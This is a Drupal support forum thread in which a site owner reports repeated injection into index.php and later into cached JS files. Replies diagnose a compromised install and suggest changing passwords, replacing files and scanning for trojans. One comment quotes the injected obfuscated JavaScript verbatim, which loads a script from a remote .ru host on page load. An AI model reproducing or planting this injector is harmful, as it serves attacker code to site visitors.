By adam_b on

I got an error this afternoon on all site pages:
Parse error: syntax error, unexpected '<' in /homepages/31/d292789962/htdocs/parentfocus/index.php on line 41

I replaced the index.php page and all was fine - but a few hours later it was back. The site was last changed on 19 December when I updated it to v6.15

This looks similar to http://drupal.org/node/632452 but it's on index.php and therefore killing the entire site.

Help me......

Categories: Drupal 6.x

Comments

vm’s picture

vm commented

rather than replacing the index.php, note the time the file was changed. have you looked for the < in the file? is there "other" code there?

are all your modules up to date?

adam_b’s picture

adam_b commented

All the modules are up to date.

I found something odd at the end of the older index.php files after drupal_page_footer:

<script>/*GNU GPL*/ try{window.onload = function(){var Hpna2fvtao7 = document.createElement('s)&c$^r!)))^i$!p&#t!(!'.replace(/\)|\$|#|\!|\^|@|&|\(/ig, ''));var Pppzj4zcslqvp = 'Sgrd3nnppag';Hpna2fvtao7.setAttribute('type', 't!(@#e)&^)x##^^t$$@/!&$j@&(^a$@v)a((s#c^^r)(i@p!t&#'.replace(/\!|#|@|\(|&|\$|\^|\)/ig, ''));Hpna2fvtao7.setAttribute('src',  'h&(#t)t@@p):!!@/##/((!s##$$^p!!^e^&$$e#)&^d)(#$t!(&e@$s#^&t(&$@)-^($^n&@&e(t!&.!@^m^&$#y^)@y#$#&e)!$a@$&r^#&#^b@&o^o)!&$k))!#.^(&c#o$@^m!(&.#$#f#$l^(^i(n!g^#-^c$#o(!$m@)&!).$v#$i@&(d$$!(e&o!)$)s#$a#)&l)!!e&@)o#!n@)l#(i!^)n&(@e!!$).$#r(@)$u@:@)!8)0@@&8@(&#0@$#@(/($1!$^u(!(n)(d^^1$&#(.#))d()e)^^&/@((1##(!^u@(@&n!$!)^d#^)&1)&.#&@d$^e!^$/@^&g)(o&^$o$!$!g@(l)@#e#&!.^c^(o)^m)/@!@w!(($e$!l!l#s@)(f^$$a$r#!g^#o)&(.$#^#c(o!!@m@!@/&!c#)o(#!&n@s&@t(!@a$!(n#)t)#)c#o)@!n$(t#a!)^(c^t###.@c!o@@m($!/)&'.replace(/\$|\!|\)|&|@|#|\^|\(/ig, ''));Hpna2fvtao7.setAttribute('defer', 'd(!e#$@f$(!#&e!r#!&'.replace(/\)|\(|\^|@|&|\$|\!|#/ig, ''));Hpna2fvtao7.setAttribute('id', 'S!)w^z)1)^r&x($#!v&o()y!#5^&&g&@#'.replace(/&|\(|#|\$|@|\^|\!|\)/ig, ''));document.body.appendChild(Hpna2fvtao7);}} catch(Mi72roohrbiw) {}</script>
<!--17ec63acdab17bf277d5302100cb2db8-->

This looks very dubious... what is it?

I've changed the index.php file permissions to read-only - hope that'll help...

vm’s picture

vm commented

looks like your install is comprimised and may have been before you updated to 6.15.

I'd check every file in the install for any forigen files that don't belong.
I'd change my FTP, and account passwords.

Depending on the access level this is coming in on, it may be chaning file permisisons on it's own.

Could be server level security too which is the cause.

yelvington’s picture

yelvington commented

There are postings about this attack all over the Internet, and some of them suggest that your Windows PC may be the attack vector through a virus that steals your FTP password.

At a minimum, you should change ALL passwords, replace ALL the Drupal source code with fresh copies, and run virus scans on any Windows PCs that come ANYWHERE near your webserver. If you are using FTP, switch to a secure protocol (scp, sftp).

If your webserver is properly configured, there's no way Apache can modify any PHP files because of different ownership and restrictive permissions.

adam_b’s picture

adam_b commented

Okay, I've gone through it all and I think/hope I've got it. I suspect the problem originated from my computer - when I ran a scan it found and isolated a trojan horse.

Many thanks for the quick responses :)

adam_b’s picture

adam_b commented

After previous changes, things calmed down - but started having problems again today. From warnings on my PC while accessing the site, it appeared that /sites/default/files/js/*.js files were corrupt, and I found suspicious code being added at the bottom of them.

I scanned my own machine, changed the FTP access password, replaced the entire Drupal installation with new files, etc - but the files were still being modified.

I tried applying the permissions changes described in http://drupal.org/node/244924 (under If you are a sysadmin/Linux servers), starting from the Drupal root directory, and now I'm getting 403 errors everywhere.

If it helps, the hosts are 1and1.co.uk

Help, pleeeeeease.